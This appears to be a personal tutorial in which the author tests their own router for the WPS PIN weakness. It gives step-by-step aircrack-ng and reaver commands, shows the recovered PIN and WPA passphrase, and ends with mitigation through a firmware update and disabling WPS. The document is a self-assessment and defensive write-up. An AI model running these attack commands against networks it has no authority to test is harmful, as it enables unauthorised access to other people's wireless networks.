In order to do this, you must have a WiFi card that can enter monitor mode. The Panda PAU05 300Mbps worked well for me, but I cannot guarantee that the card will work for you. Some cards of the same model ship with different chipsets, or have new versions released. Buy an appropriate card at your own risk!

Without a working card, you will be unable to carry out this test.

Install the necessary tools.

sudo apt-get install \
	aircrack-ng \

Disable your WiFi interface.

sudo ifconfig wlan0 down

Enable monitor mode for your WiFi interface.

sudo airmon-ng start wlan0

Note the name of the monitoring device output from the command above. In my case, it is wlan0mon.

Kill processes that may conflict with airmon tools.

sudo airmon-ng check kill

Scan for a network. PWR indicates signal strength. A number like -20 is superior to a number like -74. The greater number is superior, and -20 is greater than -74.

sudo airodump-ng wlan0mon

Try to test for the WPS vulnerability against the AP using reaver, which is specifically designed for this exploit. Specify your device's channel with -c and the BSSID (mac of the router) with -b.

sudo reaver \
	-i wlan0mon \
	-c 2 \
	-b 22:46:BA:34:CB:18 \
	-vv \
	-L \
	-N \
	-d 30 \
	-T 1 \
	-r 3:15

If your access point is vulnerable, the WPS pin will eventually be discovered.

[+] Pin cracked in 273832 seconds
[+] WPS PIN: '29701453'
[+] WPA PSK: 'thepassword123'
[+] AP SSID: 'MyAccessPoint'


My router was compromised in 273832 seconds, which is just over 3 days.

My Netgear WNR2000v3 was then updated to the latest firmware as listed here.

Current Firmware Version:     V1.0.1.26
New Firmware Version:	      V1.1.2.18
Current GUI Language Version: V1.0.0.55
New GUI Language Version:	  V1.0.0.175

This upgrade automatically enables a 3 second lockout for failed WPS attempts.

Unfortunately, reaver did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.

I then disabled WPS entirely in the admin interface. As many articles mention, some routers don't actually disable WPS even if the interface implies it is disabled.

In cases like that, it seems the only reliable preventative measure is to either get a router that actually disables WPS, or install DD-WRT on your router.

Fortunately, this firmware upgrade actually worked in my case, and reaver was unable to determine my PIN.